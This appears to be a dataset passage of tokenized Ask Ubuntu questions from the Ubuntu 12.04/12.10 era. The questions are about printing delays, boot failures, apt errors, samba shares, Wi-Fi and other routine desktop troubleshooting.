-- -- -- -- -- -- -- -- -- -- -- -- - mountall.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mountall-net.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mountall-reboot.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mountall-shell.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mounted-debugfs.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mounted-dev.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mounted-proc.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mounted-run.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mounted-tmp.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - mounted-var.conf networking networking.conf network-interface network-interface.conf network-interface-container network-interface-container.conf network-interface-security network-interface-security.conf newrelic-sysmond -- -- -- -- -- -- -- -- -- -- -- -- -- - ondemand -- -- -- -- -- -- -- -- -- -- -- -- -- - plymouth plymouth.conf plymouth-log plymouth-log.conf plymouth-splash plymouth-splash.conf plymouth-stop plymouth-stop.conf plymouth-upstart-bridge plymouth-upstart-bridge.conf postgresql -- -- -- -- -- -- -- -- -- -- -- -- -- - pppd-dns -- -- -- -- -- -- -- -- -- -- -- -- -- - procps procps.conf rc rc.conf rc.local -- -- -- -- -- -- -- -- -- -- -- -- -- - rcs rcs.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - rc-sysinit.conf reboot -- -- -- -- -- -- -- -- -- -- -- -- -- - resolvconf resolvconf.conf rsync -- -- -- -- -- -- -- -- -- -- -- -- -- - rsyslog rsyslog.conf screen-cleanup screen-cleanup.conf sendsigs -- -- -- -- -- -- -- -- -- -- -- -- -- - setvtrgb setvtrgb.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - shutdown.conf single -- -- -- -- -- -- -- -- -- -- -- -- -- - skeleton -- -- -- -- -- -- -- -- -- -- -- -- -- - ssh ssh.conf stop-bootlogd -- -- -- -- -- -- -- -- -- -- -- -- -- - stop-bootlogd-single -- -- -- -- -- -- -- -- -- -- -- -- -- - sudo -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- - tty1.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - tty2.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - tty3.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - tty4.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - tty5.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - tty6.conf udev udev.conf udev-fallback-graphics udev-fallback-graphics.conf udev-finish udev-finish.conf udevmonitor udevmonitor.conf udevtrigger udevtrigger.conf ufw ufw.conf umountfs -- -- -- -- -- -- -- -- -- -- -- -- -- - umountnfs.sh -- -- -- -- -- -- -- -- -- -- -- -- -- - umountroot -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- - upstart-socket-bridge.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - upstart-udev-bridge.conf urandom -- -- -- -- -- -- -- -- -- -- -- -- -- - -- -- -- -- -- -- -- -- -- -- -- -- -- - ureadahead.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - ureadahead-other.conf -- -- -- -- -- -- -- -- -- -- -- -- -- - wait-for-state.conf whoopsie whoopsie.conf to be honest , i 'm not entirely sure if i 'm interpreting the division of responsibilities properly , as i did n't expect to see any overlap ( of what framework handles which services ) . so i was quite surprised to learn that there was a significant amount of overlap in service references , in addition to being unable to discern which of the two was intended to be the primary service framework . why does there seem to be a fair amount of redundancy in individual service handling between init.d and upstart ? is something else at play here that i 'm missing ? what is preventing upstart from completely taking over for init.d ? is there some functionality that certain daemons require which upstart does not yet have , which are preventing some services from converting ? or is it something else entirely ?
207974	printing is delayed in 12.10	i use ubuntu 12.10 on my laptop ( intel core 2 duo @ 2.0 ghz , 2 gb ram ) with a network printer ( brother mfc-8710dw ) and the printing is very delayed . i am using the newest version of the cupswrapper driver from the brother solutions center . after i hit print , a little printer icon pops up in the top right corner next to the battery icon , wireless icon , volume , etc ... . and it just hangs there . the printing is delayed anywhere from thirty seconds to one minute . while this is n't too much of a problem , it can be if i have to print something last minute before running out the door to get to school on time . is this caused by some sort of error ? if so , how can i fix this error ? is it caused by something else ? how do i get my printing to be faster ? thank for your help in advance . i was asked to include the logs . this is /var/log/cups/access_log : localhost - smithfamily [ 31/oct/2012:16:23:57 -0700 ] `` post / http/1.1 '' 200 186 renew- subscription successful-ok localhost - smithfamily [ 31/oct/2012:16:37:56 -0700 ] `` post / http/1.1 '' 200 186 renew- subscription successful-ok localhost - smithfamily [ 31/oct/2012:17:17:10 -0700 ] `` post / http/1.1 '' 200 186 renew- subscription client-error-not-found localhost - smithfamily [ 31/oct/2012:17:17:10 -0700 ] `` post / http/1.1 '' 200 176 create- printer-subscription successful-ok /var/log/cups/page_log was empty when i checked /var/log/cups/error_log : w [ 31/oct/2012:16:21:44 -0700 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'brother-mfc-7820n-gray.. ' already exists w [ 31/oct/2012:16:21:44 -0700 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-brother-mfc-7820n ' already exists w [ 31/oct/2012:16:21:44 -0700 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'hp_color_laserjet_cp1215-gray.. ' already exists w [ 31/oct/2012:16:21:44 -0700 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'hp_color_laserjet_cp1215-rgb.. ' already exists w [ 31/oct/2012:16:21:44 -0700 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-hp_color_laserjet_cp1215 ' already exists w [ 31/oct/2012:16:21:44 -0700 ] createprofile failed : org.freedesktop.colormanager.alreadyexists : profile id 'mfc-8710dw-gray.. ' already exists w [ 31/oct/2012:16:21:44 -0700 ] createdevice failed : org.freedesktop.colormanager.alreadyexists : device id 'cups-mfc-8710dw ' already exists there were some other files in this directory , but they were .gz files , so i was unsure of whether i should include them . the files were : access_log.1.gz access_log.2.gz access_log.3.gz error_log.1.gz error_log.2.gz error_log.3.gz should i include these as well in order to solve the problem ( if there is one ) ?
207977	how to use zeroconf in kubuntu 12.04	i have two laptops sitting next to each other , both running kubuntu 12.04 , and my goal here is to share files between them using zeroconf networking . here 's what the wiki says about how to configure zeroconf in kubuntu : procedure 1 . zeroconf configuration open system settings by going to kmenu â system settings . select network settings . in the left hand side of the network settings dialog , select the zeroconf service discovery option . if the enable zeroconf network browsing or the browse local network options are not selected , please select them now and press the apply button . the trouble is that the network settings dialog does not have a zeroconf service discovery option . it does have a service discovery option but it 's all greyed out . zeroconf does seem to be installed , and the routing table has an entry for 169.254.0.0 . i have a feeling that everything i need is there , but i ca n't figure out how to use it .
207986	software center failing to install softwares	my lappy is running ubuntu 12.04 lts . there is no best server found for iit kharagpur servers . error message : '' failed to download package files check your internet connection. '' but it is connected to internet .
207990	asus q500a will not boot from live dvd	i just purchased a new pc yesterday , an asus q500a . i downloaded ubuntu 12.10 , burned it to a dvd , and tried to install it . as expected , i came to a screen that asked if i wanted to try , install , oem install , or check the disc . after going to try , the dvd spins up as if it 's about to boot the system and then immediately spins down again to leave a black screen . i 've tried several boot options : noacpi nolacpi acpi=off removing quiet splash -- nolacpi results in the dvd drive not spinning up at all . the rest have no effect . some stats about the system : intel i5-3210m processor intel integrated graphics 4000 any tips on other things to try ?
207991	lan is working . but wifi is n't connecting	i am using ubuntu 12.04 lts . when i am connecting lan cable , internet is working fine , but when i disconnect lan and switch on wifi , internet is n't working . is there any additional drivers to be installed ? ?
207999	how to add dialup group ?	i recently moved to ubuntu earlier i was a windows user so i know nothing about ubuntu . i have installed wammu on my desktop but it does n't work , says add dialup group . how to i solve this ?
208001	bluetooth keyboard not working after 12.10 upgrade	after the update my bluetooth keyboard works fine with the exception of the shift , ctrl , alt , and win/start keys ( oddly the menu key works ) . running xev shows that no event is generated on a keypress . switching to a wired keyboard works and the keys work which leads me to believe its a bluetooth issue . i killed and restarted bluetooth and the issue still persists . even the volume buttons work on it , but not those buttons which i obviously need . is this a bluetooth issue from the upgrade ?
208002	configure autofs to access windows domain server	i want to configure autofs to access my windows domain server say my server in win2003 and want to access e $ i am able to access it graphical way but every time i restart the system i have to mount it again from graphical way some time i gets some bus error but if i try again it connects why this error comes thanks for your help
208007	how to partition hard disk to save data during ubuntu reinstallation	how to partition 160gb hard disk such as whenever i reinstall or upgrade my data on it should be safe such as it should n't get deleted ? for example in windows xp , i have four partitions like c , d , e , f . whenever i install new window xp or anything in c : , my data in d : , e : and f : are safe . but this does n't happen in linux my all data were wiped out when i changed ubuntu from 10.10 to 12.04 .
208008	can ubuntu nexus 7 installer be ported to asus transformer tf700 ?	is this something that would be possible ? would be very nice if that would be possible , tf700 has full root and even nvflasher available for us : )
208009	sudo apt-get update showing error	when i am trying to run this command sudo apt-get update it is showing the following error e : malformed line 59 in source list /etc/apt/sources.list ( dist parse ) e : the list of sources could not be read . this is the line 59 in sources.list file deb http : //archive.canonical.com/ partner any suggestions ?
208010	how to start just the panel to show list of open windows ?	i am on ubuntu 10.2 ( amazon cloud box ) . when i minimize a window , it disappears and starts running in the background . when i click the mouse 's middle button it comes back to the foreground . is there a way i can have start something like just panel ( may be xpanel ) which will show me all the opened windows and i just have to click on it to bring the application to fore ground ? thanks in advance
208011	floppy drive not working properly in ubuntu 10.04	i have been trying to get a computer sorted for my dad to backup all his floppy disks . i have been able to get the drive recognised but each time i click on the icon it says it is unable to mount as no media detected . i have tried using the following terminal command : udisks -- mount /dev/fd this displays the following message device file /dev/fd is not a block device : resource temporarily unavailable any ideas how to fix it ?
208013	how can i set up samba shares to only be accessed by certain users ?	i have a raid10 array mounted on ubuntu server 12.04 . i have created a few folders within the mount point and want the following functionality . there will be 4 users , 3 of them are windows users : 'one ' 'two ' & 'three ' . 'four ' is a media streamer that only needs to access the media share . one two and three need to have full access to the media share and their own personal shares ( for documents ) which no other users but them can access . currently , user four works perfectly ( has full access to the media folder and ca n't access folders owned by other users ) . the problem is , when logged in as the other user , i ca n't access either share ; ( tried using valid users = and using chmod to add permissions to no avail ) . tl ; dr : i need to know how to configure samba properly to restrict access to certain shares for certain users and allow all of them to access one communal folder ( all files on a raid10 mount ) .
208015	how can i remove username from panel in 12.10 ?	any help would be greatly appreciated !
208020	software update presuming to upgrade my system to ubuntu 12.10	i 'm using ubuntu 12.04 lts , which i 'm perfectly happy with . the past week , software update has been pushing me ( without my intervention ) to upgrade to 12.10 . rather than presenting me with the `` upgrade '' button at the top of the software update dialog box , it just automatically selects a bunch of critical updates ( c libraries , x & nvidia drivers , etc . ) suitable for upgrades only , and warns me about having to update in two separate attempts ( `` not all updates can be installed '' ) . i do n't want to do this ! i just want to make standard security and bug fixes and stick with 12.04 . ( i unselected `` recommended updates '' to avoid the problem , but it seems to be a strange way to deal with this . ) is there some setting i need to reset to avoid this behavior ? thanks .
208021	what to do to install ubuntu 12.10 in virtual pc ?	after starting the vpc with the iso captured it gets to the loading screen , everything seems ok and then the loading screen turns green . that is , after some seconds it changes to a screen covered by green ||||||| on the bottom 3/4 parts of the screen and the top is purple that turns black . nothing more happens after that . i had waited for 10 min , tried the x64 bit ( not compatible ) and other irrelevant , ineffective things . what should i do ? vpc ram : 1111 mb , hard drive dynamic up to 130,000 mb , iso image re-downloaded twice . the host os is windows 7 .
208022	unable to boot from a usb drive on samsung series 9 notebook	related ubuntu 12.04 wo n't boot on samsung series 9 np900x3a ( ssd hard-drive ) i 'm trying to get rid of windows but i ca n't boot from usb because the usb slots on the right ( usb 3.0 ) on the samsung series 9 does n't recognize my usb stick . i tried downloading the usb drivers from the samsung site and installing them from the windows partition , but still no luck . any ideas how i can get the usb slots working and get rid of windows ?
208029	do i need to uninstall lxde before installing kde-standard ?	i have ubuntu 12.04 ( upgraded from 10.04 ) and since i disliked the default desktop , i installed lxde ( sudo apt-get install lxde ) . this was good except that occasionally there would be trouble with firefox ( blinking on panel ) so that finally i had to close it and then a error message from ubuntu was issued . i had asked about it before but there was no useful response so now i want to move to another desktop which will hopefully not create the problem i have now . my doubt is , should i first uninstall lxde and then install kde ( sudo apt-get install kde-standard ) or is it enough to install kde without uninstalling lxde ? in case it is necessary to uninstall , should i use the command sudo apt-get remove lxde or is there a better command for it ? you may also help me with choice of desktop . i installed lxde since this is simple and lightweight . i am assuming that kde will not be as simple but hopefully not create problem like above . but i hate if it takes too long to log in or to launch a program like firefox etc and also there should not be icons fixed on the left part of terminal ( i hate to keep icons on desktop since these are distracting ) . some of these issues were present with default ubuntu 12.04 . so is my choice of kde-standard appropriate or are there better desktop alternatives ?
208030	search for files with gui	i would like to search for a file with gui . i have 2 files : /world/europe/georgia_and-its_capital-tbilisi.info /world/north_americas/usa/georgia_state_capital.info ; a search for : find /world -name `` *gia*capit* '' -- brings up the two files . how to conduct this search with nautilus ' search or any alternate suggestion ? i use ubuntu 12.04 lts . and applications | search is not available on it .
208037	'some index files failed to download ' while updating	when running sudo apt-get update i get these following errors : err archive.ubuntu.com quantal inrelease err archive.ubuntu.com quantal-updates inrelease err archive.ubuntu.com quantal-backports inrelease err archive.ubuntu.com quantal-security inrelease err archive.ubuntu.com quantal release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] err archive.ubuntu.com quantal-updates release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] err archive.ubuntu.com quantal-backports release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] err archive.ubuntu.com quantal-security release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] reading package lists ... done w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal/inrelease w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal-updates/inrelease w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal-backports/inrelease w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal-security/inrelease w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal/release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal-updates/release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal-backports/release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : failed to fetch archive.ubuntu.com/ubuntu/dists/quantal-security/release.gpg unable to connect to archive.ubuntu.com : http : [ ip : 91.189.92.177 80 ] w : some index files failed to download . they have been ignored , or old ones used instead . i am using ubuntu 12.04 . this is the command i used after installing ubuntu from window installer . i am sure my laptop is connected to internet . what can i do now ?
208043	i get a `` no default or ui configuration directive found '' on boot	no default or ui configuration directive found . i get this error when i tried to reboot ubuntu with the diskonkey flash drive .
208044	bios is not showing device booting list after installing ubuntu12.10 64ibt	bios is not showing device booting list after installing ubuntu12.10 64 bit and because of which i am unable to install another os through my bootable usb . installing ubuntu12.10 64 bit has changed my bios device booting list.boot menu is only showing ubuntu.and thus i am unable to select the bootable usb drive .please help .
208045	synergy clipboard ( copy/paste ) not working with glipper ?	( just wanted to document this ; self-answer to follow ) i have a setup with quicksynergy between two ubuntu machines , set up like this : ubuntu 10.04.4 lts ( lucid ) - synergy server , has mouse attached ubuntu 11.04 ( natty ) - synergy client ( wants to use server mouse ) i 've been using this setup some year ( s ) ago - and everything was working fine . i come back to such a setup these days - and while the mouse pointer switches fine between screens , copy/paste on the client failed to work completely : that is , i select some text in any application ( from scite to firefox ) and copy ( either via ctrl-c ; or via right-click/copy from context menu ) - i then try to paste ( either via ctrl-v ; or via right-click/copy from context menu ) , and absolutely nothing happens . even more , after doing a copy action , right-clicking on the context menu shows `` paste '' menu entry to be greyed out ( disabled ) - as if there is no data whatsoever on clipboard ! so , first i checked synergy versions on both machines , and it turns out they do n't match ( even though that was probably the case also previously in time , when i used the same setup , and everything was working ) . so i updated synergy in both machines by using synergy : gogo [ ppa : trebelnik-stefina/synergy ] ( i 've used the maverick binaries for the lucid machine ) . now both of them show the same version ; e.g . for client : $ synergyc -- version synergyc 1.4.11 , protocol version 1.4 ... $ synergys -- version synergys 1.4.11 , protocol version 1.4 however , the copy/paste problem still persists . the only thing that may have changed in respect to clipboard on these machines since last time i used a synergy connection successfully , is that i have installed the glipper clipboard applet on both machines . could this have been the problem ?
208048	internal mic not working with skype 4.0.0.8 in12.04	i installed skype 4.0.0.8 in my lubuntu 12.04 . the internal mic is not working , while the external mic is . at the same time , other recording software ( like gnome sound recorder , audacity or guvcview ) are working ok with both inputs ( internal and external ) . do you have any idea why this can be ? in the skype configuration , 'allowing skype to manage my volume control ' is unchecked . if i check it , skype turns mic and boost volume to the maximum , but it 's not good ( a lot of cracks and my voice on the background almost inaudible ) .
208051	ca n't play mp4 files in edubuntu 12.04	i have installed new edubuntu 12.04 and unfortunately my mp4 files are not running .
208054	can i dual boot two linux distros with common boot partition ?	can i dual boot two linux distros with common boot partition ? the reason i 'm asking this is because i have a lvm setup with only one primary partition for /boot .
208059	is there any ubuntu version for psp and ps3 ?	is there any ubuntu version for psp and ps3 ? if yes , where is the iso files located ? i think it is impressive to have ubuntu on psp and ps3 .
208060	display resolution problem with sony tv and intel integrated graphics	i am trying to set the correct display resolution for my sony tv ( kdl-32v2000 , native resolution 1366x768 ) connected via hdmi to my htpc running ubuntu 12.04 . i have a intel core i3-530 and intel mobo ( dh57jg ) , so no proprietary graphics drivers . the problem is that i ca n't get the correct resolution to display on the tv . initially i only had 1024x768 ( or similar ) as a maximum resolution , which was not displayed properly . i tried a few steps , including generating an xorg.conf ( initially did n't have one ) and adding the segment as described in this post regarding this particular tv . i could n't get this to work , and at this stage have reverted to running without an xorg.conf . another post suggested upgrading to kernel 3.5 , which did give me a 1920x1080 resolution option . this results in the tv cutting off a fair bit of the edges of the screen . my dell laptop with ati drivers recognises the tv screen and works well via hdmi . any idea how to proceed ?
208061	no such partition grub rescue	i 'm desperate . i have windows 7 home premium installed on my notebook and i decided to install ubuntu as usual . nevertheless , i had several problems with the graphic card while installing and i got some problems and i couldnt run ubuntu properly , so i decided to uninstall ubuntu by formatting the partition and joining it to my data partition ( where it originally came from ) . afterthat , i can not enter into any os . not even from the bios . but the partitions are there . there is no way , i have tried a windows dvd to repair boot , but no repair option is offered just installation , also i tried `` lilo '' as this post said . i tried super grub disk with no luck . even boot-repair from a live-cd where i could just obtain a report . what can i do ? i just want to have my windows boot as usual and then i will try again the linux installation . but i need to come back to my windows boot . what i get when i boot is : error : no such partition . grub rescue > _ an ls here get this : ( hd0 ) ( hd1 ) ( hd1 , gpt5 ) ( hd1 , gpt4 ) ( hd1 , gpt3 ) ( hd1 , gpt2 ) ( hd1 , gpt1 ) ( hd2 ) ( hd2 , gpt2 ) ( hd2 , gpt1 ) it is a new computer ( asus ux32vd ) and the ubuntu version i deleted was 12.10 . i do n't want to reinstall windows because i 'll lost my license key . i do n't know what else can i do .
208069	trouble setting up wvdial	i 'm using nokia x2-00 as modem and idea as service provider.my wvdial settings are as follows : [ dialer defaults ] init1 = atz init2 = atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 init3 = at+cgdcont=1 , '' ip '' , '' internet '' , ,0,0 ; phone = *99 # isdn = 0 modem type = usb modem ; password = new pppd = yes stupidmode = 1 ; username = modem = /dev/ttyacm0 baud = 460800 while connecting i get message as follows : -- > wvdial : internet dialer version 1.61 -- > can not get information for serial port . -- > initializing modem . -- > sending : atz atz ok -- > sending : atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 atq0 v1 e1 s0=0 & c1 & d2 +fclass=0 ok -- > sending : at+cgdcont=1 , '' ip '' , '' internet '' , ,0,0 at+cgdcont=1 , '' ip '' , '' internet '' , ,0,0 ok -- > modem initialized . -- > configuration does not specify a valid phone number . -- > configuration does not specify a valid login name . -- > configuration does not specify a valid password . i tried changing the phone number to *99***1 # and username and password as my phone number , but it is still not working .
208072	on how many supercomputers does ubuntu actually run on	i asked a question on superuser on how many supercomputer run on linux and was wondering on how many supercomputer 's ubuntu run on ?
208075	deja-dup backup encrypted home	some days ago i have encrypted my home thanks to ecryptfs-utils . now i have a big doubt regarding deja-dup and the future backup : can i backup the files that are in my home folder ? will they be backupped encrypted or non encrypted ? ( i have to write something else otherwise i can not post this question..excuse me for this ) thanks in advance !
208079	ubuntu 12.10 install fails , both native and wubi	i have a windows install in place and wanted to install ubuntu 12.10 . i got the iso ( x86 to be precise ) and burned it to a dvd . the ubuntu install fails right after asking me my name saying `` ubi-partman failed with code 10 '' . the wubi installer says : '' nonetype has no attribute get_info '' here 's the log file : http : //www.pastebin.com/ftz0f6vi why do both fail ? btw i 've md5ed the iso and the dvd , both are ok , not corrupt .
208084	another error in migration	i got error when vm migration `` unable to migrate guest : operation failed : migration job : unexpectedly failed `` please help me
208092	i can not see the drives on my computer	i 'm a new ubuntu user and i installed this ubuntu 12.04 from a usb stick . it all went fine but as i notice , there are no drives shown on the menu . i tried some command in the terminal to see if the drives are available and yes , they are available . my problem is how to make these drives show up on the menu above . sorry if this question is somewhat vague . ( i removed the image because i am not allowed to add an image because i have insufficient reputation )
208093	samsung series 5 overheating	i bought a samsung series 5 ultra 2 weeks ago and installed ubuntu 12.04 lts . i am experiencing problems with overheating . when streaming , watching a movie or when having several programms/actions going on at the same time the cpu temperature rises to 95 degrees and the computer freezes . this happens sometimes when the computer is on battery and always when it is recharging . when i am using the computer on battery the cpu temperature is floating from around 75-95 degrees depending what it 's doing . when the battery is recharging the cpu temperature is ranging from 88-95 degrees no matter what tasks it performs . have anyone experienced this and how may the problem be solved ? best regards
208096	dvd rw+ not showing up	i 'm running ubuntu 12.10 on a toshiba satellite pro a120 and my built in dvd drive is not opening any cd/dvd/dvd rw that am trying to play on them . the drive seems to be mounted and recongnized : output of sudo lshw : ... < $ > *-cdrom description : dvd-ram writer product : dvd-ram uj-841s vendor : matshita physical id : 1 bus info : scsi @ 1:0.0.0 logical name : /dev/cdrom logical name : /dev/cdrw logical name : /dev/dvd logical name : /dev/dvdrw logical name : /dev/sr0 version : 1.40 capabilities : removable audio cd-r cd-rw dvd dvd-r dvd-ram configuration : ansiversion=5 status=ready *-medium physical id : 0 logical name : /dev/cdrom < $ > and the disk seems to start but hang with the dvd drive led solid amber ... . the output of < $ > jun @ jun-satellite-pro-a120 : ~ $ dmesg | grep `` sr0 '' [ 679396.184901 ] sr 1:0:0:0 : [ sr0 ] unhandled sense code [ 679396.184910 ] sr 1:0:0:0 : [ sr0 ] result : hostbyte=did_ok driverbyte=driver_sense [ 679396.184920 ] sr 1:0:0:0 : [ sr0 ] sense key : hardware error [ current ] [ 679396.184931 ] sr 1:0:0:0 : [ sr0 ] add . sense : id crc or ecc error [ 679396.184942 ] sr 1:0:0:0 : [ sr0 ] cdb : read ( 10 ) : 28 00 00 00 00 00 00 00 08 00 [ 679396.184965 ] end_request : i/o error , dev sr0 , sector 0 [ 679396.184975 ] buffer i/o error on device sr0 , logical block 0 [ 679396.184984 ] buffer i/o error on device sr0 , logical block 1 [ 679396.184990 ] buffer i/o error on device sr0 , logical block 2 [ 679396.184996 ] buffer i/o error on device sr0 , logical block 3 [ 679396.185002 ] buffer i/o error on device sr0 , logical block 4 [ 679396.185008 ] buffer i/o error on device sr0 , logical block 5 [ 679396.185014 ] buffer i/o error on device sr0 , logical block 6 [ 679396.185020 ] buffer i/o error on device sr0 , logical block 7 [ 679396.185031 ] buffer i/o error on device sr0 , logical block 8 [ 679396.185038 ] buffer i/o error on device sr0 , logical block 9 [ 679396.185070 ] sr 1:0:0:0 : [ sr0 ] unaligned transfer [ 679396.185108 ] sr 1:0:0:0 : [ sr0 ] unaligned transfer < $ > can someone help me through this ? tired of moving around with an external dvd drive . thanks
208101	ubuntu 12.10 does n't boot after fresh install	i 've installed yesterday ubuntu 12.10 32-bit version ( as recommended ) on my laptop . it was a fresh install , alongside windows xp . on grub , after choosing normal boot on ubuntu , it starts loading things , but before starting the ubuntu loading screen ( with the dots ) it stops flashing hdd activity led , and hangs there , and i need to hard shutdown the laptop . however , if i choose recovery mode on grub , and then choose normal boot on the options screen , it starts , but it does n't allow to choose the native screen resolution ( 1440x900 ) . how can i solve the problem on normal boot ? how can i grab more information about the reason it hangs ? i thought that starting in recovery mode it showed the reason , but it starts and does n't hang , so i ca n't extract any information about the issue . can you help me ? thank you !
208103	how to install oracle server ?	i have installed the oracle client but i am not able to install the oracle server . how do i install oracle server ?
208106	how to get mouse buttons to work	i just installed ubuntu 12.10 x64 on my hp windows 7 computer . after installation and login it brings me to the desk top . all i 'm able to do is move my mouse pointer around . clicking the left or right buttons do nothing at all . i have tried clicking on all the icons on the left menu & random spots on the desktop . how can i get ubuntu to play nice with my mice ? mouse= logitech g5 & hp wireless intel core 2 q9300 8gb ddr3 radeon hd 4650
208107	can i sort files in dolphin into date order on kubuntu 12.04.01 ?	can i sort files in dolphin into date order on kubuntu 12.04.01 ? it was suggested ( ca n't remember where ) that nepomuk would do this . if this is so , how do i enable nepomuk . the application appears to have been installed , but clicking it does nothing
208108	pc wont install from pendrive	i made a bootable usb stick using pen drive linux 's usb installer , but my pc does n't recognize it when booting . i have set the bios to select usb as first choice but it just bypasses it and boots from the hard disk .
208109	error when i do update	i get the following error when trying to update ubuntu : w : failed to fetch http : //extras.ubuntu.com/ubuntu/dists/precise/release.gpg unable to connect to 173.10.10.1:8080 : , e : some index files failed to download . they have been ignored , or old ones used instead .
208112	how do i add more than one command to /etc/rc.local ?	i want to add two power saving commands to /etc/rc.local file . this to disable bluetooth : rfkill block bluetooth and this to reduce screen brightness : echo 3024 > /sys/class/backlight/intel_backlight/brightness separately added to /etc/rc.local they work but not both of them together like this : # /bin/sh -e # # rc.local # # this script is executed at the end of each multiuser runlevel . # make sure that the script will `` exit 0 '' on success or any other # value on error . # # in order to enable or disable this script just change the execution # bits . # # by default this script does nothing . echo 3024 > /sys/class/backlight/intel_backlight/brightness rfkill block bluetooth exit 0 how do i add the two commands to get them properly executed at start-up ? update it turned out to be a timing issue . i fixed it by delaying the execution of the first command thus : ( sleep 5 ; echo 3021 > /sys/class/backlight/intel_backlight/brightness ) &
208114	ubuntu destop not working and libreoffice menu text missing after ubuntu update	[ libreoffice menu text missing after ubuntu update ] [ 1 ] i was using ubuntu 12.04 lts smoothly and started forgetting ms-windows . but recently i notice a upgrade notification of ubuntu 12.10 in update manager . i started upgrading . it took lot of time and after that machine re-booted and i got only a blue screen . i tried a lot to solve this problem but all of my effort was useless . i uninstalled ubuntu from windows vista and then installed my original 12.04 again . now , i just updated ubuntu instead of upgrade and then noticed my desktop icon are missing , right click not working on desktop and libreoffice menus are not fully visible . ! [ enter image description here ] [ 2 ]
208116	weird lines are appearing on shut down	i 'm using ubuntu 11.04 because windows has gone wrong . from the first time i shut ubuntu down weird text had been appearing then the screen goes off-then shuts down . is there any way to get my computer to say shutting down ubuntu ( or something like that ) when i shut down without using terminal to get it to do this ? the only reason i do n't want to use terminal is because i 'm new to ubuntu and i do n't want to do something wrong and not not be able log on or something .
208118	is the 32 gb nexus 7 compatible with ubuntu ?	i want to buy a 32 gb nexus 7 to try installing ubuntu - will it be compatible ?
208121	are there any applications like sap available for ubuntu ?	i am in a business , and the company i am in uses sap . are there any applications like sap available for ubuntu ?
208123	trying to upgrade but	trying to upgrade but when asks me for password , says wrong password try again . i have ubuntu 9.04 and when i try to upgrade to 10.04.03 lts .
208124	installation failure	i have just downloaded ubuntu and burned an installation dvd . i used it to install ubuntu on a pc running windows xp choosing the option to run ubuntu alongside windows . i chose to install the additional updates after initial installation . when i choose ubuntu from the menu displayed on boot-up i get a purple and yellow screen which is completely blank except for the functioning mouse pointer . i would be grateful for suggestions on how to fix this .
208126	dash does not keep source filter beyond a session in 12.10	is there any way to keep filter settings in the dash beyond a session ? for example , in the application lens i want to disable the software center source in the list of the available apps . i can do this by going to the filter button and click on the local app source . but if i log out and then log in , this setting is reverted to the default behavior ( i.e . display both local and available apps ) . here it 's suggested to use myunity , but it 's not possible in 12.10 .
208129	can i set my computer to say ' shut down ' when i shut it down rather than show gnome lines ?	i 'm running ubuntu 11.04 and the first time i shut it down it started showing gnome lines . i did n't change any settings before and it goes on for a reasonable amount of time . i do n't want to use terminal because i 'm new to ubuntu , linux and gnome ! so can anyone give me a way to get ubuntu to say shutting down rather then these lines ?
208131	how can i delete files in ubuntu one ?	i am having difficulty deleting files in ubuntu one . it does not delete , but it downloads . there needs to be more space on the site for the delete `` button '' . have any suggestions ?
208132	quantal- gdm not working	i installed ubuntu on 11.10 and the first thing i did was install gdm . it survived the upgrade to precise but on the upgrade to quantal , it just shows the background and the mouse , then it sticks there , forever . i purged gdm and then reinstalled it , but no avail . please help ! edit : i just can not reinstall my system another edit : i tried running gnome-shell -- gdm-mode on another display , and the output said something about a typeerror in /usr/share/gnome-shell/js/ui/main.js:74 ( at the _sessionupdate )
208133	after upgrade to ubuntu 12.10 unable to load gui	after the upgrade to ubuntu 12.10 from 12.04 , no gui is displayed . i have to operate my pc in the command line . how can i solve this problem ?
208134	repacking of the squashfs file	how to unpack and repack squashed system.img file ? i am a noob in linux so give me a detailed instruction , please . my ubuntu version is 12
